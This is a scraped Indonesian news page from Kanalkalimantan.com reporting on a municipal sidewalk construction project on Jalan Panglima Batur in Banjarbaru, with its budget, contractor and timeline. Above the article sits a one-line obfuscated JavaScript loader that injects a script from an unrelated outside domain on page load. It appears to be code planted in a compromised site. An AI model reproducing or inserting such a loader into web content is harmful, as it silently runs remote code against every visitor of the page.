(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');

Pedestrian Jalan Panglima Batur Mulai Digarap, dari Depan SMPN 2 hingga Balai Kota


KANALKALIMANTAN.COM, BANJARBARU – Setelah proyek Jembatan Penyeberangan Orang (JPO) digarap, kini Bidang Bina Marga Dinas Pekerjaan Umum dan Penataan Ruang (PUPR) Kota Banjarbaru melanjutkan program prioritas pembangunan trotoar Jalan Panglima Batur, Kelurahan Mentaos, Kota Banjarbaru, Kalimantan Selatan.

Digarap selama 210 hari masa pelaksanaan oleh CV Andhika Karya, pembangunan trotoar atau pedestrian Panglima Batur menggunakan dana APBD Kota Banjarbaru senilai Rp 4,8 miliar.

Pedestrian Panglima Batur akan dibangun sepanjang 700 meter dari depan SMPN 2 Banjarbaru sampai Balai Kota Banjarbaru.

Kepala Bidang Bina Marga Dinas PUPR Kota Banjarbaru, Adi Maulana mengatakan, pengerjaan fasilitas untuk pejalan kaki di Jalan Panglima Batur sudah mulai berjalan dan kontraknya terhitung dari tanggal 31 Mei 2022 hingga 27 Desember 2022.

 

 

Baca juga: Satgas TMMD Kodim 1022 Latih Remaja Desa Sumber Arum Jadi Paskibra Upacara HUT Kemerdekaan

Adapun pembangunan trotal tersebut dikatakan Adi Maulana dari SMPN 2 Banjarbaru hingga Balai Kota Banjarbaru.

Proyek pembangunan trotoar atau pedestrian di Jalan Panglima Batur Banjarbaru sudah dimulai. Foto: ibnu

“Panjang trotoar yang dibangun kurang lebih 700 meter dengan lebar variasi berdasarkan segmen dari 2,5 – 4,5 meter,” ujarnya kepada Kanalkalimantan.com, Jum’at (29/7/2022).

Dijelaskannya Adi pembangunan trotoar atau pedestrian jalan Panglima Batur ini akan menggunakan batu endesit dengan menggunakan pola freanch pattern.

Diakui Adi, sempat terjadi keterlambatan dari proses persiapan dokumen tender, seperti aturan dan harga satuan yang dijadikan acuan.

“Untuk proses ada sedikit keterlambatan diproses persiapan dokumen tender karena ada perubahan aturan terkait dokumen tender yang baru dan analisa harga satuan baru yang harus kami jadikan acuan,” akunya.

Lebih jauh dengan adanya beberapa kendala keterlambatan dipersiapan dokumen, Adi tetap optimis proyek pembangunan trotoar Jalan Panglima Batur selesai tepat waktu, pun jika terjadi keterlambatan pihak ketiga akan dikenakan adendum.

“Kami optimis pekerjaan akan selesai tepat waktu, walaupun secara aturan untuk pekerjaan yang tidak dapat selesai tepat waktu dapat diberikan kesempatan untuk menyelesaikan pekerjaan tersebut dengan diberikan denda keterlambatan sesuai kontrak,” bebernya.

Baca juga: Curi Honda Scoopy, Warga Pelabuhan Speed Batulicin Ditangkap Polisi

Proyek pembangunan trotoar atau pedestrian di Jalan Panglima Batur Banjarbaru sudah dimulai. Foto: ibnu

Sama halnya dengan JPO yang dibangun di Jalan A Yani Km 34, trotoar Jalan Panglima Batur ini juga diperuntukkan untuk para pejalan kaki baik yang berkegiatan sehari-hari, olahraga hingga bisa bersantai di dana. Serta memperindah kawasan di Jalan Panglima Batur.

“Trotoar ini hampir sama dengan JPO juga jadi fungsinya itu untuk memberikan pelayanan kenyamanan bagi pejalan kaki,” tuntasnya.

Dari pantauan kanalkalimantan.com, CV Andhika Karya sudah mulai melakukan pekerjaan beberapa hari yang lalu, nampak mesin ekskavator mini mulai menggali dan pelebaran saluran drainase mulai depan SMPN 2 Banjarbaru yang akan dibangun trotoar Panglima Batur.(Kanalkalimantan.com/ibnu)

Reporter : ibnu
Editor : bie


Risa

Recent Posts

Diberi Waktu Tiga Bulan, Peternakan Babi di Jalan Pandarapan Harus Dibongkar

KANALKALIMANTAN.COM, BANJARBARU – Sebanyak 21 kepala keluarga (KK) pemilik peternakan babi di Jalan Pandarapan RT… Read More

3 jam ago

Upacara Ritual Adat Mamapas Lewu di Desa Penda Ketapi

KANALKALIMANTAN.COM, KUALA KAPUAS - Warga Desa Penda Ketapi, Kecamatan Kapuas Barat, Kabupaten Kapuas, Kalteng, menggelar… Read More

3 jam ago

Penyuluhan Kesehatan Satgas TMMD di Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Satgas TNI Manunggal Membangun Desa (TMMD) menggelar sosialisasi penyuluhan kesehatan masyarakat di… Read More

3 jam ago

Terbagi Tiga Kloter, Pj Bupati Kapuas Ingatkan Calon Haji Jaga Kondisi Kesehatan

KANALKALIMANTAN.COM, KUALA KAPUAS - Penjabat (Pj) Bupati Kapuas Erlin Hardi melepas ratusan jemaah calon haji… Read More

3 jam ago

81 Peserta Ikuti Audisi Pemilihan Nanang dan Galuh Kabupaten Banjar

KANALKALIMANTAN.COM, MARTAPURA - Sebanyak 81 orang terdiri atas 27 laki-laki dan 54 perempuan dari beberapa… Read More

4 jam ago

Rumah di Banjarmasin Ambruk ke Sungai, Penghuni Keluar Lewat Jendela

KANALKALIMANTAN.COM, BANJARMASIN - Sebuah rumah di Jalan Sutoyo S, Gang Serumpun, Kelurahan Pelambuan, Kecamatan Banjarmasin… Read More

4 jam ago

This website uses cookies.